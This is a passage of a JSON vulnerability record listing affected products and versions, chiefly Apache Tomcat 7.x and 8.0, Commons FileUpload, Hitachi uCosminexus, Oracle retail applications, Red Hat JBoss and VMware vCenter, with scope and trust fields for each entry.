            "model": "ucosminexus primary server base )",
            "scope": "eq",
            "trust": 1.5,
            "vendor": "hitachi",
            "version": "09-50"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "8.0.1"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.50"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.33"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.32"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.31"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.30"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.29"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.28"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.27"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.26"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.25"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.24"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.23"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.16"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.15"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.14"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.13"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.12"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.9"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.8"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.7"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.6"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.4"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.3"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.2"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.1"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.5"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.40"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.22"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.21"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.20"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.19"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.18"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.11"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.10"
          },
          {
            "_id": null,
            "model": "commons fileupload",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "1.2.2"
          },
          {
            "_id": null,
            "model": "commons fileupload",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "1.2.1"
          },
          {
            "_id": null,
            "model": "commons fileupload",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "1.2"
          },
          {
            "_id": null,
            "model": "commons fileupload",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "1.1.1"
          },
          {
            "_id": null,
            "model": "commons fileupload",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "1.1"
          },
          {
            "_id": null,
            "model": "commons fileupload",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "1.0"
          },
          {
            "_id": null,
            "model": "ucosminexus service platform )",
            "scope": "eq",
            "trust": 1.2,
            "vendor": "hitachi",
            "version": "09-50"
          },
          {
            "_id": null,
            "model": "ucosminexus service platform",
            "scope": "eq",
            "trust": 1.2,
            "vendor": "hitachi",
            "version": "09-50"
          },
          {
            "_id": null,
            "model": "ucosminexus service platform )",
            "scope": "eq",
            "trust": 1.2,
            "vendor": "hitachi",
            "version": "09-00"
          },
          {
            "_id": null,
            "model": "ucosminexus service platform",
            "scope": "eq",
            "trust": 1.2,
            "vendor": "hitachi",
            "version": "09-00"
          },
          {
            "_id": null,
            "model": "ucosminexus primary server base",
            "scope": "eq",
            "trust": 1.2,
            "vendor": "hitachi",
            "version": "09-50"
          },
          {
            "_id": null,
            "model": "ucosminexus primary server base )",
            "scope": "eq",
            "trust": 1.2,
            "vendor": "hitachi",
            "version": "09-00"
          },
          {
            "_id": null,
            "model": "ucosminexus primary server base",
            "scope": "eq",
            "trust": 1.2,
            "vendor": "hitachi",
            "version": "09-00"
          },
          {
            "_id": null,
            "model": "ucosminexus application server )",
            "scope": "eq",
            "trust": 1.2,
            "vendor": "hitachi",
            "version": "09-50"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "7.0.17"
          },
          {
            "_id": null,
            "model": "commons fileupload",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "apache",
            "version": "1.3"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "7.0.0"
          },
          {
            "_id": null,
            "model": "retail applications",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "oracle",
            "version": "14.0"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "7.0.36"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "7.0.49"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "7.0.42"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "7.0.43"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "7.0.35"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "7.0.46"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "7.0.47"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "7.0.34"
          },
          {
            "_id": null,
            "model": "retail applications",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "oracle",
            "version": "13.3"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "7.0.39"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "7.0.48"
          },
          {
            "_id": null,
            "model": "retail applications",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "oracle",
            "version": "13.2"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "7.0.38"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "8.0.0"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "7.0.45"
          },
          {
            "_id": null,
            "model": "retail applications",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "oracle",
            "version": "13.0"
          },
          {
            "_id": null,
            "model": "retail applications",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "oracle",
            "version": "12.0"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "7.0.44"
          },
          {
            "_id": null,
            "model": "retail applications",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "oracle",
            "version": "13.1"
          },
          {
            "_id": null,
            "model": "retail applications",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "oracle",
            "version": "12.0in"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "7.0.41"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "7.0.37"
          },
          {
            "_id": null,
            "model": "retail applications",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "oracle",
            "version": "13.4"
          },
          {
            "_id": null,
            "model": "ucosminexus application server",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "hitachi",
            "version": "09-50"
          },
          {
            "_id": null,
            "model": "ucosminexus application server )",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "hitachi",
            "version": "09-00"
          },
          {
            "_id": null,
            "model": "ucosminexus service platform",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-60"
          },
          {
            "_id": null,
            "model": "ucosminexus service platform",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-50-02"
          },
          {
            "_id": null,
            "model": "ucosminexus service platform hp-ux",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-50"
          },
          {
            "_id": null,
            "model": "ucosminexus service platform (windows(x8",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-00-03"
          },
          {
            "_id": null,
            "model": "ucosminexus service platform",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-00-03"
          },
          {
            "_id": null,
            "model": "ucosminexus service platform hp-ux",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-00-02"
          },
          {
            "_id": null,
            "model": "ucosminexus service platform (windows(x6",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-00-02"
          },
          {
            "_id": null,
            "model": "ucosminexus service platform",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-00-02"
          },
          {
            "_id": null,
            "model": "ucosminexus service platform hp-ux",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-00"
          },
          {
            "_id": null,
            "model": "ucosminexus service architect )",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-50"
          },
          {
            "_id": null,
            "model": "ucosminexus service architect",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-50"
          },
          {
            "_id": null,
            "model": "ucosminexus service architect )",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-00"
          },
          {
            "_id": null,
            "model": "ucosminexus service architect",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-00"
          },
          {
            "_id": null,
            "model": "ucosminexus primary server base",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-60"
          },
          {
            "_id": null,
            "model": "ucosminexus primary server base",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-50-02"
          },
          {
            "_id": null,
            "model": "ucosminexus primary server base (windows(x8",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-00-03"
          },
          {
            "_id": null,
            "model": "ucosminexus primary server base",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-00-03"
          },
          {
            "_id": null,
            "model": "ucosminexus primary server base hp-ux",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-00-02"
          },
          {
            "_id": null,
            "model": "ucosminexus primary server base (windows(x6",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-00-02"
          },
          {
            "_id": null,
            "model": "ucosminexus primary server base",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-00-02"
          },
          {
            "_id": null,
            "model": "ucosminexus primary server base hp-ux",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-00"
          },
          {
            "_id": null,
            "model": "ucosminexus developer )",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-50"
          },
          {
            "_id": null,
            "model": "ucosminexus developer",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-50"
          },
          {
            "_id": null,
            "model": "ucosminexus developer )",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-00"
          },
          {
            "_id": null,
            "model": "ucosminexus developer",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-00"
          },
          {
            "_id": null,
            "model": "ucosminexus application server-r )",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-50"
          },
          {
            "_id": null,
            "model": "ucosminexus application server-r",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-50"
          },
          {
            "_id": null,
            "model": "ucosminexus application server-r )",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-00"
          },
          {
            "_id": null,
            "model": "ucosminexus application server-r",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-00"
          },
          {
            "_id": null,
            "model": "ucosminexus application server hp-ux",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-50"
          },
          {
            "_id": null,
            "model": "ucosminexus application server (windows(x8",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-00-03"
          },
          {
            "_id": null,
            "model": "ucosminexus application server hp-ux",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-00-02"
          },
          {
            "_id": null,
            "model": "ucosminexus application server (windows(x6",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-00-02"
          },
          {
            "_id": null,
            "model": "ucosminexus application server",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-00-02"
          },
          {
            "_id": null,
            "model": "ucosminexus application server hp-ux",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-00"
          },
          {
            "_id": null,
            "model": "programming environment for java )",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-50"
          },
          {
            "_id": null,
            "model": "programming environment for java )",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-00"
          },
          {
            "_id": null,
            "model": "cosminexus component container",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-50-03"
          },
          {
            "_id": null,
            "model": "cosminexus component container )",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-50"
          },
          {
            "_id": null,
            "model": "cosminexus component container )",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-00"
          },
          {
            "_id": null,
            "model": "cosminexus component container window",
            "scope": "ne",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-50-04"
          },
          {
            "_id": null,
            "model": "cosminexus component container",
            "scope": "ne",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-50-04"
          },
          {
            "_id": null,
            "model": "vcenter server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "5.5"
          },
          {
            "_id": null,
            "model": "vcenter server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "5.1"
          },
          {
            "_id": null,
            "model": "vcenter server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "vcenter orchestrator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "5.5"
          },
          {
            "_id": null,
            "model": "vcenter orchestrator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "5.1"
          },
          {
            "_id": null,
            "model": "vcenter orchestrator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "4.2"
          },
          {
            "_id": null,
            "model": "vcenter operations management suite",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "5.8.1"
          },
          {
            "_id": null,
            "model": "vcenter operations management suite",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "5.7.1"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "13.10"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "12.10"
          },
          {
            "_id": null,
            "model": "linux lts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "12.04"
          },
          {
            "_id": null,
            "model": "linux 10.04.lts",
            "scope": null,
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": null
          },
          {
            "_id": null,
            "model": "linux enterprise server sp3 for vmware",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "11"
          },
          {
            "_id": null,
            "model": "linux enterprise server sp3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "11"
          },
          {
            "_id": null,
            "model": "internet sales",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sap",
            "version": "7.54"
          },
          {
            "_id": null,
            "model": "internet sales",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sap",
            "version": "7.33"
          },
          {
            "_id": null,
            "model": "internet sales",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sap",
            "version": "7.32"
          },
          {
            "_id": null,
            "model": "internet sales",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sap",
            "version": "7.31"
          },
          {
            "_id": null,
            "model": "internet sales",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sap",
            "version": "7.30"
          },
          {
            "_id": null,
            "model": "opensuse",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "12.3"
          },
          {
            "_id": null,
            "model": "jboss operations network",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3.2.1"
          },
          {
            "_id": null,
            "model": "jboss operations network",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3.2.0"
          },
          {
            "_id": null,
            "model": "jboss fuse service works",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "6.0.0"
          },
          {
            "_id": null,
            "model": "jboss fuse",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "jboss enterprise web server el6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "jboss enterprise web server el5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "jboss enterprise application platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "6.2.1"
          },
          {
            "_id": null,
            "model": "jboss enterprise application platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "6.2"
          },
          {
            "_id": null,
            "model": "jboss enterprise application platform el6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "6"
          },
          {
            "_id": null,
            "model": "jboss enterprise application platform el5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "6"
          },
          {
            "_id": null,
            "model": "jboss brms",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "6.0.1"
          },
          {
            "_id": null,
            "model": "jboss brms",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "6.0.0"
          },
          {
            "_id": null,
            "model": "jboss bpms",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "6.0.1"
          },
          {
            "_id": null,
            "model": "jboss bpms",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "jboss a-mq",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "6.0.0"
          },
          {
            "_id": null,
            "model": "fuse esb enterprise",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "7.1.0"
          },
          {
            "_id": null,
            "model": "enterprise linux workstation optional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "6"
          },
          {
            "_id": null,
            "model": "enterprise linux workstation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "6"
          },
          {
            "_id": null,
            "model": "enterprise linux server optional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "6"
          },
          {
            "_id": null,
            "model": "enterprise linux server eus 6.5.z",
            "scope": null,
            "trust": 0.3,
            "vendor": "redhat",
            "version": null
          },
          {
            "_id": null,
            "model": "enterprise linux server aus",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "6.5"
          },
          {
            "_id": null,
            "model": "enterprise linux server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "6"
          },
          {
            "_id": null,
            "model": "enterprise linux hpc node optional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "6"
          },
          {
            "_id": null,
            "model": "enterprise linux hpc node",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "6"
          },
          {
            "_id": null,
            "model": "enterprise linux desktop optional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "6"
          },
          {
            "_id": null,
            "model": "enterprise linux desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "6"
          },
          {
            "_id": null,
            "model": "weblogic portal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.3.6.0"
          },
          {
            "_id": null,
            "model": "webcenter sites",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "11.1.18.0"
          },
          {
            "_id": null,
            "model": "webcenter sites",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "7.6.2"
          },
          {
            "_id": null,
            "model": "webcenter sites",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "11.1.1.6.1"
          },
          {
            "_id": null,
            "model": "retail returns management rm2.0",
            "scope": null,
            "trust": 0.3,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "retail returns management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "14.0"
          },
          {
            "_id": null,
            "model": "retail returns management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "13.4"
          },
          {
            "_id": null,
            "model": "retail returns management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "13.3"
          },
          {
            "_id": null,
            "model": "retail returns management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "13.2"
          },
          {
            "_id": null,
            "model": "retail returns management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "13.1"
          },
          {
            "_id": null,
            "model": "retail returns management 12.0in",
            "scope": null,
            "trust": 0.3,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "retail returns management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "12.0"
          },
          {
            "_id": null,
            "model": "retail open commerce platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "retail central office rm2.0",
            "scope": null,
            "trust": 0.3,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "retail central office",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "14.0"
          },
          {
            "_id": null,
            "model": "retail central office",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "13.4"
          },
          {
            "_id": null,
            "model": "retail central office",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "13.3"
          },
          {
            "_id": null,
            "model": "retail central office",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "13.2"
          },
          {
            "_id": null,
            "model": "retail central office",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "13.1"
          },
          {
            "_id": null,
            "model": "retail central office",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "13.0"
          },
          {
            "_id": null,
            "model": "retail central office 12.0in",
            "scope": null,
            "trust": 0.3,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "retail central office",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "12.0"
          },
          {
            "_id": null,
            "model": "retail back office rm2.0",
            "scope": null,
            "trust": 0.3,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "retail back office",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "14.0"
          },
          {
            "_id": null,
            "model": "retail back office",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "13.4"
          },
          {
            "_id": null,
            "model": "retail back office",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "13.3"
          },
          {
            "_id": null,
            "model": "retail back office",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "13.2"
          },
          {
            "_id": null,
            "model": "retail back office",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "13.1"
          },
          {
            "_id": null,
            "model": "retail back office",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "13.0"
          },
          {
            "_id": null,
            "model": "retail back office 12.0in",
            "scope": null,
            "trust": 0.3,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "retail back office",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "12.0"
          },
          {
            "_id": null,
            "model": "mysql enterprise monitor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "3.0.10"
          },
          {
            "_id": null,
            "model": "mysql enterprise monitor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "mysql enterprise monitor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "2.3.16"
          },
          {
            "_id": null,
            "model": "mysql enterprise monitor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "2.3.15"
          },
          {
            "_id": null,
            "model": "mysql enterprise monitor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "2.3.14"
          },
          {
            "_id": null,
            "model": "mysql enterprise monitor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "2.3.13"
          },
          {
            "_id": null,
            "model": "mysql enterprise monitor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "2.3"
          },
          {
            "_id": null,
            "model": "health sciences empirica study",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "3.1.2.0"
          },
          {
            "_id": null,
            "model": "health sciences empirica signal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "7.3.3.3"
          },
          {
            "_id": null,
            "model": "health sciences empirica inspections",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.0.1.0"
          },
          {
            "_id": null,
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "7"
          },
          {
            "_id": null,
            "model": "enterprise linux",
